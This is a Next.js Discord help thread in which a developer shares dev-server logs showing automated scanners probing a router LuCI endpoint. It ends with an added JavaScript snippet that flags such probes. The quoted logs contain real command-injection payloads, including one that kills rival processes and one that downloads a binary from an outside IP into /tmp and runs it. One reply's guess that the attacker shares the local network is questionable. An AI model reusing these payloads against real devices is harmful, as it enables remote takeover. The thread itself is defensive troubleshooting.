Next.js Discord

someone trying to hack me?

Answered
Wool sower gall maker posted this in #help-forum
Wool sower gall maker (OP)
so I'm working on a small project, and I see on my console that someone is trying to make CGI commands on my website?
I don't know what CGI commands can do, but according to Google, it could be bad. Also, the command that they try to do is different from time to time, and sometimes I can see the IP of who tries to "hack" me.

the startup command I use: "next dev"

the log I get sometimes: "
○ Compiling /_not-found ...
 ✓ Compiled /_not-found in 3.9s (471 modules)
 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) 404 in 4066ms
"
((id>`for proc_dir in /proc/[0-9]*; do pid=${proc_dir##*/}; buffer=$(cat "/proc/$pid/maps"); if [ "${#buffer}" -gt 1 ]; then if [ "${buffer#*"/lib/"}" = "$buffer" ] && [ "${buffer#*"telnetdbot"}" = "$buffer" ]; then kill -9 "$pid"; fi; fi; done`))

another log that I saw, and that one had an IP in it: "
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F*i removed the ip*%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) 404 in 57ms
"
('country': $(id> `cd /tmp; rm -rf shk; wget http:// i removed the ip/shk; chmod 777 shk; ./shk tplink; rm -rf shk`))

and yes the port for the website is open. (how bad is that?)

does anyone know what I can do in this situation?
Answered by joulev
firstly, don't worry, you are not getting hacked.

now onto the how did they do this. most likely, they are on the same network as yourself, know your local IP address and simply go to, say, <your-ip-address>:3000/cgi-bin/.... it's quite simple as long as they are in the same network and know your local IP.

(i'm assuming you are developing your app, so you use next dev. don't deploy your app with next dev, you should be using next start instead.)

9 Replies

American Chinchilla
Call the FBI or police.
@Wool sower gall maker
Jokes aside, did you deploy to Vercel?
If you did, you can block by user agent
And set up two factor connection to prevent spam.
Wool sower gall maker (OP)
mhm, I understand now, I do notice how stupid I was,
I was working on my app, and I used to view the app through my public IP, now that I'm looking at it, it's really a BAD idea to do that,
I'm gonna switch to localhost instead of my public IP,
I'll also note that I need to use "next start" in production instead of "next dev".
thanks for the help!
I also get these logs on my production server, I think this is some sort of bot that keeps trying to find a vuln on public IPs.
Wool sower gall maker (OP)
well yeah, that could be.
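
Added example, not part of the original thread: one way to triage log lines like the ones quoted above, decoding the query string and flagging requests that target paths the app never serves or carry shell metacharacters. The names `triageLine`, `findProbes` and `FOREIGN_PREFIXES` are hypothetical, and the sample lines are constructed with a harmless placeholder command.

```javascript
// Added example: flag scanner-style requests in Next.js dev-server log lines.
// Matches lines shaped like " GET /path?query 404 in 57ms".
const LINE_RE = /^\s*(GET|POST|PUT|PATCH|DELETE|HEAD|OPTIONS) (\S+) (\d{3}) in (\d+)ms\s*$/;
// Shell metacharacters used for command substitution or chaining.
const SHELL_RE = /\$\(|`|;|\|\||&&/;
// Assumption: path prefixes this app never serves; adjust per project.
const FOREIGN_PREFIXES = ['/cgi-bin/', '/wp-admin/', '/.env'];

function safeDecode(s) {
  // '+' encodes a space in query strings; malformed %-escapes must not throw.
  try {
    return decodeURIComponent(s.replace(/\+/g, ' '));
  } catch {
    return s;
  }
}

function triageLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null; // build output such as "Compiling ..." is not a request
  const [, method, target, statusText] = m;
  const status = Number(statusText);
  const q = target.indexOf('?');
  const path = q === -1 ? target : target.slice(0, q);
  const reasons = [];
  if (FOREIGN_PREFIXES.some((p) => path.startsWith(p))) reasons.push('foreign-path');
  const params = {};
  for (const pair of (q === -1 ? '' : target.slice(q + 1)).split('&').filter(Boolean)) {
    const eq = pair.indexOf('=');
    const key = safeDecode(eq === -1 ? pair : pair.slice(0, eq));
    params[key] = safeDecode(eq === -1 ? '' : pair.slice(eq + 1));
    if (SHELL_RE.test(params[key])) reasons.push(`shell-meta:${key}`);
  }
  // 404 means no route matched the request, as in the log lines quoted above.
  return { method, path, status, params, reasons, probe: reasons.length > 0, notFound: status === 404 };
}

// Constructed sample lines (the injected command is a harmless placeholder).
const SAMPLE_LOG = [
  ' ○ Compiling /_not-found ...',
  ' GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60echo+probe%60) 404 in 57ms',
  ' GET /dashboard?tab=billing 200 in 12ms',
];

function findProbes(lines) {
  return lines.map(triageLine).filter((r) => r !== null && r.probe);
}

console.log(JSON.stringify(findProbes(SAMPLE_LOG), null, 2));
```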